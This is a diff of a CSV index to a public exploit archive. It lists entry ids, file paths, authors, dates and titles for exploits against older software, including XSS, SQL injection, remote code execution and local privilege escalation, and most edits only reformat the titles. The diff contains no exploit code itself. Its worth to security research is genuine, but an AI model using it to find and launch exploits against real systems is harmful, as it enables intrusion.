id,file,description,date,author,platform,type,port 33020,platforms/linux/dos/33020.py,"CUPS 1.3.9 - 'cups/ipp.c' NULL Pointer Dereference Denial Of Service",2009-06-02,"Anibal Sacco",linux,dos,0 33021,platforms/php/webapps/33021.txt,"PHP-Nuke 8.0 Downloads Module - 'query' Parameter Cross-Site Scripting",2009-06-02,"Schap Security",php,webapps,0 33022,platforms/php/webapps/33022.txt,"Joomla! < 1.5.11 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2009-06-03,"Airton Torres",php,webapps,0 -33023,platforms/multiple/remote/33023.txt,"Apache Tomcat 6.0.18 Form Authentication Existing/Non-Existing Username Enumeration Weakness",2009-06-03,"D. Matscheko",multiple,remote,0 +33023,platforms/multiple/remote/33023.txt,"Apache Tomcat 6.0.18 - Form Authentication Existing/Non-Existing Username Enumeration Weakness",2009-06-03,"D. Matscheko",multiple,remote,0 33024,platforms/windows/remote/33024.txt,"Microsoft Internet Explorer 5.0.1 - Cached Content Cross Domain Information Disclosure",2009-06-09,"Jorge Luis Alvarez Medina",windows,remote,0 33025,platforms/windows/remote/33025.txt,"LogMeIn 4.0.784 - 'cfgadvanced.html' HTTP Header Injection",2009-06-05,Inferno,windows,remote,0 33026,platforms/ios/webapps/33026.txt,"Depot WiFi 1.0.0 iOS - Multiple Vulnerabilities",2014-04-25,Vulnerability-Lab,ios,webapps,0 @@ -29806,7 +29806,7 @@ id,file,description,date,author,platform,type,port 33047,platforms/multiple/remote/33047.html,"WebKit 'parent/top' Cross Domain Scripting",2009-05-19,"Gareth Hayes",multiple,remote,0 33048,platforms/java/webapps/33048.txt,"DirectAdmin 1.33.6 - 'CMD_REDIRECT' Cross-Site Scripting",2009-05-19,r0t,java,webapps,0 33049,platforms/linux/dos/33049.txt,"LibTIFF 3.8.2 - 'LZWDecodeCompat()' Remote Buffer Underflow",2009-05-21,wololo,linux,dos,0 -33050,platforms/windows/remote/33050.html,"Microsoft Internet Explorer 7/8 HTML Attribute JavaScript URI Security Bypass",2009-05-22,80vul,windows,remote,0 +33050,platforms/windows/remote/33050.html,"Microsoft Internet Explorer 7/8 - HTML Attribute JavaScript URI Security Bypass",2009-05-22,80vul,windows,remote,0 33051,platforms/cgi/remote/33051.txt,"Nagios 3.0.6 - 'statuswml.cgi' Remote Arbitrary Shell Command Injection",2009-05-22,Paul,cgi,remote,0 33052,platforms/php/webapps/33052.txt,"Basic Analysis And Security Engine 1.2.4 - 'readRoleCookie()' Authentication Bypass",2009-05-23,"Tim Medin",php,webapps,0 33053,platforms/linux/remote/33053.txt,"Samba 3.3.5 - Format String / Security Bypass",2009-05-19,"Jeremy Allison",linux,remote,0 @@ -29839,7 +29839,7 @@ id,file,description,date,author,platform,type,port 33083,platforms/multiple/dos/33083.txt,"Oracle 9i/10g Database TNS Command Remote Denial of Service",2009-06-14,"Dennis Yurichev",multiple,dos,0 33084,platforms/multiple/remote/33084.txt,"Oracle 9i/10g Database - Network Foundation Remote",2009-06-14,"Dennis Yurichev",multiple,remote,0 33085,platforms/php/webapps/33085.txt,"Scriptsez Easy Image Downloader - 'id' Parameter Cross-Site Scripting",2009-06-14,Moudi,php,webapps,0 -33086,platforms/multiple/dos/33086.txt,"America's Army 3.0.4 Invalid Query Remote Denial of Service",2009-06-06,"Luigi Auriemma",multiple,dos,0 +33086,platforms/multiple/dos/33086.txt,"America's Army 3.0.4 - Invalid Query Remote Denial of Service",2009-06-06,"Luigi Auriemma",multiple,dos,0 33087,platforms/php/webapps/33087.txt,"PHPLive! 3.2.2 - 'request.php' SQL Injection",2009-06-16,boom3rang,php,webapps,0 33088,platforms/linux/dos/33088.txt,"Linux Kernel 2.6.30 - 'tun_chr_pool()' NULL Pointer Dereference",2009-06-17,"Christian Borntraeger",linux,dos,0 33089,platforms/windows/remote/33089.pl,"iDefense COMRaider ActiveX Control Multiple Insecure Method Vulnerabilities",2009-06-17,"Khashayar Fereidani",windows,remote,0 @@ -29852,7 +29852,7 @@ id,file,description,date,author,platform,type,port 33578,platforms/multiple/remote/33578.txt,"XAMPP 1.6.x - 'showcode.php' Local File Inclusion",2009-07-16,MustLive,multiple,remote,0 33579,platforms/multiple/dos/33579.txt,"Ingres Database 9.3 Heap Buffer Overflow",2010-01-29,"Evgeny Legerov",multiple,dos,0 33580,platforms/hardware/remote/33580.txt,"Comtrend CT-507 IT ADSL Router - 'scvrtsrv.cmd' Cross-Site Scripting",2010-01-29,Yoyahack,hardware,remote,0 -33095,platforms/windows/remote/33095.rb,"Adobe Flash Player Type Confusion Remote Code Execution",2014-04-29,Metasploit,windows,remote,0 +33095,platforms/windows/remote/33095.rb,"Adobe Flash Player - Type Confusion Remote Code Execution",2014-04-29,Metasploit,windows,remote,0 33096,platforms/multiple/dos/33096.txt,"Crysis 1.21/1.5 HTTP/XML-RPC Service Access Violation Remote Denial of Service",2009-06-20,"Luigi Auriemma",multiple,dos,0 33097,platforms/php/webapps/33097.txt,"Programs Rating rate.php id Parameter XSS",2009-06-20,Moudi,php,webapps,0 33098,platforms/php/webapps/33098.txt,"Programs Rating postcomments.php id Parameter XSS",2009-06-20,Moudi,php,webapps,0 @@ -29860,7 +29860,7 @@ id,file,description,date,author,platform,type,port 33100,platforms/multiple/dos/33100.txt,"S.T.A.L.K.E.R. Clear Sky 1.0010 - Remote Denial of Service",2009-06-22,"Luigi Auriemma",multiple,dos,0 33101,platforms/linux/dos/33101.txt,"Mozilla Firefox 3.0.11 and Thunderbird 2.0.9 - RDF File Handling Remote Memory Corruption",2009-06-21,"Christophe Charron",linux,dos,0 33102,platforms/php/webapps/33102.txt,"CommuniGate Pro 5.2.14 Web Mail URI Parsing HTML Injection",2009-06-23,"Andrea Purificato",php,webapps,0 -33103,platforms/linux/remote/33103.html,"Mozilla Firefox 3.5.1 Error Page Address Bar URI Spoofing",2009-06-24,"Juan Pablo Lopez Yacubian",linux,remote,0 +33103,platforms/linux/remote/33103.html,"Mozilla Firefox 3.5.1 - Error Page Address Bar URI Spoofing",2009-06-24,"Juan Pablo Lopez Yacubian",linux,remote,0 33104,platforms/multiple/dos/33104.txt,"Star Wars Battlefront II 1.1 - Remote Denial of Service",2009-06-24,"Luigi Auriemma",multiple,dos,0 33105,platforms/multiple/dos/33105.txt,"TrackMania 2.11.11 - Multiple Remote Vulnerabilities",2009-06-27,"Luigi Auriemma",multiple,dos,0 33106,platforms/php/webapps/33106.txt,"PG MatchMaking browse_ladies.php show Parameter XSS",2009-06-24,Moudi,php,webapps,0 @@ -29875,7 +29875,7 @@ id,file,description,date,author,platform,type,port 33115,platforms/php/webapps/33115.txt,"AlmondSoft Multiple Classifieds Products - index.php replid Parameter SQL Injection",2009-06-27,Moudi,php,webapps,0 33116,platforms/php/webapps/33116.txt,"AlmondSoft Multiple Classifieds Products - index.php Multiple Parameter XSS",2009-06-27,Moudi,php,webapps,0 33117,platforms/php/webapps/33117.txt,"AlmondSoft Classifieds Pro gmap.php addr Parameter XSS",2009-06-27,Moudi,php,webapps,0 -33118,platforms/multiple/remote/33118.html,"Apple Safari 4.0.1 Error Page Address Bar URI Spoofing",2009-06-27,"Juan Pablo Lopez Yacubian",multiple,remote,0 +33118,platforms/multiple/remote/33118.html,"Apple Safari 4.0.1 - Error Page Address Bar URI Spoofing",2009-06-27,"Juan Pablo Lopez Yacubian",multiple,remote,0 33119,platforms/php/webapps/33119.txt,"Pilot Group eTraining courses_login.php cat_id Parameter XSS",2009-06-24,Moudi,php,webapps,0 33120,platforms/php/webapps/33120.txt,"Pilot Group eTraining news_read.php id Parameter XSS",2009-06-24,Moudi,php,webapps,0 33121,platforms/php/webapps/33121.txt,"Pilot Group eTraining lessons_login.php Multiple Parameter XSS",2009-06-24,Moudi,php,webapps,0 @@ -29888,11 +29888,11 @@ id,file,description,date,author,platform,type,port 40080,platforms/php/webapps/40080.txt,"Tiki Wiki CMS 15.0 - Arbitrary File Download",2016-07-11,"Kacper Szurek",php,webapps,80 40081,platforms/cgi/webapps/40081.py,"Belkin Router AC1200 Firmware 1.00.27 - Authentication Bypass",2016-07-11,"Gregory Smiley",cgi,webapps,80 40082,platforms/php/webapps/40082.txt,"WordPress All in One SEO Pack Plugin 2.3.6.1 - Persistent XSS",2016-07-11,"David Vaartjes",php,webapps,80 -33197,platforms/php/webapps/33197.txt,"68 Classifieds 4.1 category.php cat Parameter XSS",2009-07-27,Moudi,php,webapps,0 +33197,platforms/php/webapps/33197.txt,"68 Classifieds 4.1 - category.php cat Parameter XSS",2009-07-27,Moudi,php,webapps,0 33130,platforms/php/webapps/33130.txt,"NTSOFT BBS E-Market Professional - Multiple Cross-Site Scripting Vulnerabilities (1)",2009-06-30,"Ivan Sanchez",php,webapps,0 33131,platforms/php/webapps/33131.txt,"XOOPS 2.3.3 - 'op' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-06-30,"Sense of Security",php,webapps,0 33132,platforms/php/webapps/33132.txt,"Softbiz Dating Script 1.0 - 'cat_products.php' SQL Injection",2009-07-30,MizoZ,php,webapps,0 -33133,platforms/multiple/dos/33133.txt,"Adobe Flash Player 10.0.22 and AIR URI Parsing Heap Buffer Overflow",2009-07-30,iDefense,multiple,dos,0 +33133,platforms/multiple/dos/33133.txt,"Adobe Flash Player 10.0.22 and AIR - URI Parsing Heap Buffer Overflow",2009-07-30,iDefense,multiple,dos,0 33134,platforms/linux/dos/33134.txt,"Adobe Flash Player 10.0.22 and AIR - 'intf_count' Integer Overflow",2009-07-30,"Roee Hay",linux,dos,0 33136,platforms/hardware/webapps/33136.txt,"Fritz!Box - Remote Command Execution Exploit",2014-05-01,0x4148,hardware,webapps,0 33340,platforms/php/webapps/33340.txt,"CuteNews 1.4.6 - index.php Multiple Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0 @@ -29951,9 +29951,9 @@ id,file,description,date,author,platform,type,port 33193,platforms/linux/dos/33193.c,"Linux Kernel 2.6.x - 'drivers/char/tty_ldisc.c' NULL Pointer Dereference Denial of Service",2009-08-19,"Eric W. Biederman",linux,dos,0 33195,platforms/php/webapps/33195.txt,"TeamHelpdesk Customer Web Service (CWS) 8.3.5 & Technician Web Access (TWA) 8.3.5 - Remote User Credential Dump",2014-05-05,bhamb,php,webapps,0 33199,platforms/php/webapps/33199.txt,"68 Classifieds 4.1 - searchresults.php page Parameter XSS",2009-07-27,Moudi,php,webapps,0 -33200,platforms/php/webapps/33200.txt,"68 Classifieds 4.1 toplistings.php page Parameter XSS",2009-07-27,Moudi,php,webapps,0 -33201,platforms/php/webapps/33201.txt,"68 Classifieds 4.1 viewlisting.php view Parameter XSS",2009-07-27,Moudi,php,webapps,0 -33202,platforms/php/webapps/33202.txt,"68 Classifieds 4.1 viewmember.php member Parameter XSS",2009-07-27,Moudi,php,webapps,0 +33200,platforms/php/webapps/33200.txt,"68 Classifieds 4.1 - toplistings.php page Parameter XSS",2009-07-27,Moudi,php,webapps,0 +33201,platforms/php/webapps/33201.txt,"68 Classifieds 4.1 - viewlisting.php view Parameter XSS",2009-07-27,Moudi,php,webapps,0 +33202,platforms/php/webapps/33202.txt,"68 Classifieds 4.1 - viewmember.php member Parameter XSS",2009-07-27,Moudi,php,webapps,0 33203,platforms/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x - WHERE Clause Secuity Bypass",2009-09-02,"Johannes Dahse",multiple,remote,0 33204,platforms/php/webapps/33204.txt,"phpAuction 3.2 - 'lan' Parameter Remote File Inclusion",2009-09-09,"Beenu Arora",php,webapps,0 33205,platforms/windows/dos/33205.pl,"Nokia Multimedia Player 1.1 - Remote Denial of Service",2009-09-01,"opt!x hacker",windows,dos,0 @@ -29963,14 +29963,14 @@ id,file,description,date,author,platform,type,port 33209,platforms/jsp/webapps/33209.txt,"Adobe RoboHelp Server 8 - Authentication Bypass",2009-09-03,Intevydis,jsp,webapps,0 33210,platforms/multiple/remote/33210.txt,"HP Operations Manager Default Manager 8.1 Account Remote Security",2009-09-03,Intevydis,multiple,remote,0 33211,platforms/multiple/remote/33211.txt,"HP Operations Dashboard 2.1 Portal Default Manager Account Remote Security",2009-09-03,Intevydis,multiple,remote,0 -33212,platforms/windows/remote/33212.rb,"Adobe Flash Player Integer Underflow Remote Code Execution",2014-05-06,Metasploit,windows,remote,0 +33212,platforms/windows/remote/33212.rb,"Adobe Flash Player - Integer Underflow Remote Code Execution",2014-05-06,Metasploit,windows,remote,0 33213,platforms/windows/local/33213.rb,"Windows - NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)",2014-05-06,Metasploit,windows,local,0 33214,platforms/php/webapps/33214.txt,"DvBBS 2.0 - 'boardrule.php' SQL Injection",2009-09-04,Securitylab.ir,php,webapps,0 -33215,platforms/multiple/remote/33215.txt,"IBM Tivoli Identity Manager 5.0.5 User Profile HTML Injection",2009-08-26,IBM,multiple,remote,0 +33215,platforms/multiple/remote/33215.txt,"IBM Tivoli Identity Manager 5.0.5 - User Profile HTML Injection",2009-08-26,IBM,multiple,remote,0 33216,platforms/hardware/dos/33216.txt,"Check Point Endpoint Security Full Disk Encryption RDP Connection Denial of Service",2009-09-09,"Tim Medin",hardware,dos,0 33217,platforms/php/webapps/33217.txt,"Joomla! 'com_pressrelease' Component - 'id' Parameter SQL Injection",2009-09-10,Moudi,php,webapps,0 33218,platforms/php/webapps/33218.txt,"Joomla! 'com_mediaalert' Component - 'id' Parameter SQL Injection",2009-09-11,Moudi,php,webapps,0 -33219,platforms/php/webapps/33219.txt,"Planet 2.0 HTML Injection",2009-09-11,"Steve Kemp",php,webapps,0 +33219,platforms/php/webapps/33219.txt,"Planet 2.0 - HTML Injection",2009-09-11,"Steve Kemp",php,webapps,0 33220,platforms/windows/dos/33220.txt,"FileCOPA FTP Server 5.01 - 'NOOP' Command Denial Of Service",2009-09-15,"Asheesh kumar Mani Tripathi",windows,dos,0 33221,platforms/windows/dos/33221.html,"Novell GroupWise Client 7.0.3.1294 - 'gxmim1.dll' ActiveX Control Buffer Overflow",2009-09-15,"Francis Provencher",windows,dos,0 33222,platforms/linux/dos/33222.txt,"Wireshark 1.2.1 - OpcUa Dissector Unspecified Resource Exhaustion DoS",2009-09-15,"Buildbot Builder",linux,dos,0 @@ -30030,7 +30030,7 @@ id,file,description,date,author,platform,type,port 33280,platforms/hardware/dos/33280.txt,"Palm WebOS 1.0/1.1 - 'LunaSysMgr' Service Denial of Service",2009-10-13,"Townsend Ladd Harris",hardware,dos,0 33281,platforms/php/webapps/33281.txt,"Achievo 1.x - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2009-10-13,"Ryan Dewhurst",php,webapps,0 33282,platforms/php/webapps/33282.txt,"Dream Poll 3.1 - 'index.php' Cross-Site Scripting / SQL Injection",2009-10-13,infosecstuff,php,webapps,0 -33283,platforms/linux/dos/33283.txt,"Adobe Reader 9.1.3 and Acrobat COM Objects Memory Corruption Remote Code Execution",2009-10-13,Skylined,linux,dos,0 +33283,platforms/linux/dos/33283.txt,"Adobe Reader 9.1.3 and Acrobat - COM Objects Memory Corruption Remote Code Execution",2009-10-13,Skylined,linux,dos,0 33284,platforms/multiple/webapps/33284.txt,"Pentaho BI 1.x - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2009-10-14,euronymous,multiple,webapps,0 33317,platforms/php/webapps/33317.txt,"AlienVault OSSIM 4.6.1 - Authenticated SQL Injection (Metasploit)",2014-05-12,"Chris Hebert",php,webapps,443 33286,platforms/java/webapps/33286.txt,"Eclipse BIRT 2.2.1 - 'run?__report' Parameter Cross-Site Scripting",2009-10-14,"Michele Orru",java,webapps,0 @@ -30042,10 +30042,10 @@ id,file,description,date,author,platform,type,port 33292,platforms/jsp/webapps/33292.txt,"IBM Rational RequisitePro 7.10 - ReqWeb Help Feature ReqWebHelp/advanced/workingSet.jsp operation Parameter XSS",2009-10-15,IBM,jsp,webapps,0 33293,platforms/jsp/webapps/33293.txt,"IBM Rational RequisitePro 7.10 ReqWeb Help Feature ReqWebHelp/basic/searchView.jsp Multiple Parameter XSS",2009-10-15,IBM,jsp,webapps,0 33294,platforms/php/webapps/33294.txt,"TBmnetCMS 1.0 - 'content' Parameter Cross-Site Scripting",2009-10-19,"drunken danish rednecks",php,webapps,0 -33295,platforms/php/webapps/33295.txt,"OpenDocMan 1.2.5 add.php last_message Parameter XSS",2009-10-21,"Amol Naik",php,webapps,0 +33295,platforms/php/webapps/33295.txt,"OpenDocMan 1.2.5 - add.php last_message Parameter XSS",2009-10-21,"Amol Naik",php,webapps,0 33296,platforms/php/webapps/33296.txt,"OpenDocMan 1.2.5 toBePublished.php Multiple Parameter XSS",2009-10-21,"Amol Naik",php,webapps,0 33297,platforms/php/webapps/33297.txt,"OpenDocMan 1.2.5 - index.php last_message Parameter XSS",2009-10-21,"Amol Naik",php,webapps,0 -33298,platforms/php/webapps/33298.txt,"OpenDocMan 1.2.5 admin.php last_message Parameter XSS",2009-10-21,"Amol Naik",php,webapps,0 +33298,platforms/php/webapps/33298.txt,"OpenDocMan 1.2.5 - admin.php last_message Parameter XSS",2009-10-21,"Amol Naik",php,webapps,0 33299,platforms/php/webapps/33299.txt,"OpenDocMan 1.2.5 category.php XSS",2009-10-21,"Amol Naik",php,webapps,0 33300,platforms/php/webapps/33300.txt,"OpenDocMan 1.2.5 department.php XSS",2009-10-21,"Amol Naik",php,webapps,0 33301,platforms/php/webapps/33301.txt,"OpenDocMan 1.2.5 profile.php XSS",2009-10-21,"Amol Naik",php,webapps,0 @@ -30065,7 +30065,7 @@ id,file,description,date,author,platform,type,port 33315,platforms/linux/remote/33315.java,"Sun Java SE November 2009 - Multiple Security Vulnerabilities (1)",2009-10-29,Tometzky,linux,remote,0 33316,platforms/multiple/remote/33316.java,"Sun Java SE November 2009 - Multiple Security Vulnerabilities (2)",2009-10-29,Tometzky,multiple,remote,0 33318,platforms/bsd/dos/33318.txt,"OpenBSD 4.6 / NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0 -33319,platforms/bsd/dos/33319.txt,"Multiple BSD Distributions 'printf(3)' Memory Corruption",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0 +33319,platforms/bsd/dos/33319.txt,"Multiple BSD Distributions - 'printf(3)' Memory Corruption",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0 33320,platforms/php/webapps/33320.txt,"TFTgallery 0.13 - 'sample' Parameter Cross-Site Scripting",2009-11-02,blake,php,webapps,0 33321,platforms/linux/local/33321.c,"Linux Kernel 2.6.0 <= 2.6.31 - 'pipe.c' Local Privilege Escalation (1)",2009-11-03,"teach & xipe",linux,local,0 33322,platforms/linux/local/33322.c,"Linux Kernel 2.6.x - 'pipe.c' Local Privilege Escalation (2)",2009-11-03,"teach & xipe",linux,local,0 @@ -30080,7 +30080,7 @@ id,file,description,date,author,platform,type,port 33330,platforms/windows/webapps/33330.txt,"SpiceWorks 7.2.00174 - Persistent XSS",2014-05-12,"Dolev Farhi",windows,webapps,80 33331,platforms/windows/remote/33331.rb,"Yokogawa CS3000 BKESimmgr.exe Buffer Overflow",2014-05-12,Metasploit,windows,remote,34205 33332,platforms/windows/dos/33332.py,"JetAudio 8.1.1 - (.ogg) Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0 -33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,Metasploit,windows,remote,0 +33333,platforms/windows/remote/33333.rb,"Adobe Flash Player - Shader Buffer Overflow",2014-05-12,Metasploit,windows,remote,0 33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80 33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 - (.ogg) Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0 33336,platforms/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Root Exploit (3)",2013-02-24,SynQ,linux,local,0 @@ -30098,8 +30098,8 @@ id,file,description,date,author,platform,type,port 33364,platforms/linux/remote/33364.txt,"KDE 4.3.3 KDELibs 'dtoa()' Remote Code Execution",2009-11-20,"Maksymilian Arciemowicz",linux,remote,0 33365,platforms/php/webapps/33365.txt,"WordPress WP-PHPList Plugin 2.10.2 - 'unsubscribeemail' Parameter Cross-Site Scripting",2009-11-29,MustLive,php,webapps,0 33366,platforms/php/webapps/33366.txt,"WordPress Trashbin Plugin 0.1 - 'mtb_undelete' Parameter Cross-Site Scripting",2009-11-15,MustLive,php,webapps,0 -33367,platforms/php/webapps/33367.txt,"FireStats WordPress Plugin 1.0.2 - Multiple Cross-Site Scripting and Authentication Bypass Vulnerabilities (1)",2009-11-24,MustLive,php,webapps,0 -33368,platforms/php/webapps/33368.html,"FireStats WordPress Plugin 1.0.2 - Multiple Cross-Site Scripting and Authentication Bypass Vulnerabilities (2)",2009-11-24,MustLive,php,webapps,0 +33367,platforms/php/webapps/33367.txt,"FireStats WordPress Plugin 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (1)",2009-11-24,MustLive,php,webapps,0 +33368,platforms/php/webapps/33368.html,"FireStats WordPress Plugin 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (2)",2009-11-24,MustLive,php,webapps,0 33370,platforms/multiple/webapps/33370.html,"ElasticSearch Remote Code Execution",2014-05-15,"Jeff Geiger",multiple,webapps,0 33371,platforms/php/webapps/33371.txt,"WordPress WP-Cumulus Plugin 1.x - 'tagcloud.swf' Cross-Site Scripting",2009-11-09,MustLive,php,webapps,0 33372,platforms/php/webapps/33372.html,"Fuctweb CapCC Plugin 1.0 for WordPress CAPTCHA - Security Bypass",2009-11-13,MustLive,php,webapps,0 @@ -30184,14 +30184,14 @@ id,file,description,date,author,platform,type,port 33487,platforms/php/webapps/33487.txt,"PhPepperShop 2.5 - 'USER_ARTIKEL_HANDLING_AUFRUF.php' Cross-Site Scripting",2010-01-12,Crux,php,webapps,0 33488,platforms/php/webapps/33488.txt,"Active Calendar 1.2 - '$_SERVER['PHP_SELF']' Variable Multiple Cross-Site Scripting Vulnerabilities",2010-01-11,"Martin Barbella",php,webapps,0 33489,platforms/multiple/remote/33489.txt,"Ruby 1.9.1 WEBrick Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 -33490,platforms/multiple/remote/33490.txt,"nginx 0.7.64 Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 -33493,platforms/multiple/webapps/33493.txt,"Multiple Stored XSS in Mayan-EDms web-based document management OS system",2014-05-24,"Dolev Farhi",multiple,webapps,0 +33490,platforms/multiple/remote/33490.txt,"nginx 0.7.64 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 +33493,platforms/multiple/webapps/33493.txt,"Mayan-EDms web-based document management OS system - Multiple Stored XSS",2014-05-24,"Dolev Farhi",multiple,webapps,0 33494,platforms/cgi/webapps/33494.txt,"Web Terra 1.1 - books.cgi Remote Command Execution",2014-05-24,"felipe andrian",cgi,webapps,0 33495,platforms/windows/dos/33495.py,"Core FTP Server 1.2 build 535 32-bit - Crash PoC",2014-05-24,"Kaczinski Ramirez",windows,dos,0 33581,platforms/linux/dos/33581.txt,"Hybserv2 - ':help' Command Denial Of Service",2010-01-29,"Julien Cristau",linux,dos,0 33582,platforms/php/webapps/33582.txt,"Joomla! 'com_rsgallery2' 2.0 Component - 'catid' Parameter SQL Injection",2010-01-31,snakespc,php,webapps,0 33583,platforms/hardware/dos/33583.pl,"Xerox WorkCentre PJL Daemon Buffer Overflow",2009-12-31,"Francis Provencher",hardware,dos,0 -33497,platforms/multiple/remote/33497.txt,"AOLServer Terminal 4.5.1 Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 +33497,platforms/multiple/remote/33497.txt,"AOLServer Terminal 4.5.1 - Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33498,platforms/multiple/remote/33498.txt,"Varnish 2.0.6 Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33499,platforms/multiple/remote/33499.txt,"thttpd 2.24 HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33500,platforms/multiple/remote/33500.txt,"mini_httpd 1.18 HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0 @@ -30336,8 +30336,8 @@ id,file,description,date,author,platform,type,port 33664,platforms/multiple/remote/33664.html,"Mozilla Firefox 3.5.8 Style Sheet Redirection Information Disclosure",2010-01-09,"Cesar Cerrudo",multiple,remote,0 33665,platforms/php/webapps/33665.txt,"Softbiz Jobs - 'sbad_type' Parameter Cross-Site Scripting",2010-02-23,"pratul agrawal",php,webapps,0 33713,platforms/windows/dos/33713.py,"Core FTP LE 2.2 - Heap Overflow PoC",2014-06-11,"Gabor Seljan",windows,dos,0 -33675,platforms/jsp/webapps/33675.txt,"Multiple IBM Products Login Page Cross-Site Scripting",2010-02-25,"Oren Hafif",jsp,webapps,0 -33676,platforms/php/webapps/33676.txt,"Newbie CMS 0.0.2 Insecure Cookie Authentication Bypass",2010-02-25,JIKO,php,webapps,0 +33675,platforms/jsp/webapps/33675.txt,"Multiple IBM Products - Login Page Cross-Site Scripting",2010-02-25,"Oren Hafif",jsp,webapps,0 +33676,platforms/php/webapps/33676.txt,"Newbie CMS 0.0.2 - Insecure Cookie Authentication Bypass",2010-02-25,JIKO,php,webapps,0 33677,platforms/php/dos/33677.txt,"PHP 5.3.1 - LCG Entropy Security",2010-02-26,Rasmus,php,dos,0 33678,platforms/jsp/webapps/33678.txt,"ARISg 5.0 - 'wflogin.jsp' Cross-Site Scripting",2010-02-26,"Yaniv Miron",jsp,webapps,0 33672,platforms/linux/dos/33672.txt,"Kojoney 0.0.4.1 - 'urllib.urlopen()' Remote Denial of Service",2010-02-24,Nicob,linux,dos,0 @@ -30381,7 +30381,7 @@ id,file,description,date,author,platform,type,port 33724,platforms/php/webapps/33724.txt,"OpenCart 1.3.2 - 'page' Parameter SQL Injection",2010-03-07,"Andrés Gómez",php,webapps,0 33725,platforms/aix/local/33725.txt,"IBM AIX 6.1.8 libodm - Arbitrary File Write",2014-06-12,Portcullis,aix,local,0 33726,platforms/php/webapps/33726.txt,"TikiWik < 4.2 - Multiple Vulnerabilities",2010-03-09,"Mateusz Drygas",php,webapps,0 -33727,platforms/php/webapps/33727.txt,"wh-em.com upload 7.0 Insecure Cookie Authentication Bypass",2010-02-16,indoushka,php,webapps,0 +33727,platforms/php/webapps/33727.txt,"wh-em.com upload 7.0 - Insecure Cookie Authentication Bypass",2010-02-16,indoushka,php,webapps,0 33728,platforms/asp/webapps/33728.txt,"IBM ENOVIA SmarTeam - 'LoginPage.aspx' Cross-Site Scripting",2010-03-09,Lament,asp,webapps,0 33729,platforms/multiple/dos/33729.txt,"PostgreSQL 8.4.1 JOIN Hashtable Size Integer Overflow Denial Of Service",2014-06-13,"Bernt Marius Johnsen",multiple,dos,0 33730,platforms/asp/webapps/33730.txt,"Max Network Technology BBSMAX 4.2 - 'threadid' Parameter Cross-Site Scripting",2010-03-10,Liscker,asp,webapps,0 @@ -30442,7 +30442,7 @@ id,file,description,date,author,platform,type,port 33791,platforms/arm/local/33791.rb,"Adobe Reader for Android - addJavascriptInterface Exploit",2014-06-17,Metasploit,arm,local,0 33792,platforms/hardware/webapps/33792.txt,"Motorola SBG901 Wireless Modem - CSRF",2014-06-17,"Blessen Thomas",hardware,webapps,0 33793,platforms/php/webapps/33793.txt,"Kasseler CMS News Module - 'id' Parameter SQL Injection",2010-03-23,Palyo34,php,webapps,0 -33794,platforms/php/webapps/33794.txt,"Multiple SpringSource Products Multiple HTML Injection Vulnerabilities",2010-03-23,"Aaron Kulick",php,webapps,0 +33794,platforms/php/webapps/33794.txt,"Multiple SpringSource Products - Multiple HTML Injection Vulnerabilities",2010-03-23,"Aaron Kulick",php,webapps,0 33795,platforms/php/webapps/33795.txt,"Joomla! 'com_aml_2' Component - 'art' Parameter SQL Injection",2010-03-23,Metropolis,php,webapps,0 33796,platforms/php/webapps/33796.txt,"Joomla! 'com_cb' Component - 'cat' Parameter SQL Injection",2010-03-23,"DevilZ TM",php,webapps,0 33797,platforms/php/webapps/33797.txt,"Joomla! 'com_jresearch' Component - 'controller' Parameter Local File Inclusion",2010-03-24,"Chip d3 bi0s",php,webapps,0 @@ -30496,7 +30496,7 @@ id,file,description,date,author,platform,type,port 33848,platforms/windows/remote/33848.py,"WinMount 3.3.401 ZIP File Remote Buffer Overflow",2010-04-19,lilf,windows,remote,0 33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - (zero_transact_article.php article_id POST parameter) SQL Injection",2014-06-23,"Filippos Mastrogiannis",php,webapps,0 33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - (.nkuser) File Creation NULL Pointer Denial Of Service",2014-06-13,"A reliable source",windows,dos,0 -33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 Memory Consumption Remote Denial of Service",2010-04-27,fallenpegasus,linux,dos,0 +33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 - Memory Consumption Remote Denial of Service",2010-04-27,fallenpegasus,linux,dos,0 33851,platforms/php/webapps/33851.txt,"WordPress TimThumb 2.8.13 WebShot Plugin/Theme - Remote Code Execution (0Day)",2014-06-24,@u0x,php,webapps,0 33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 Source Code Information Disclosure",2010-04-22,"Veerendra G.G",multiple,remote,0 33860,platforms/windows/dos/33860.html,"Microsoft 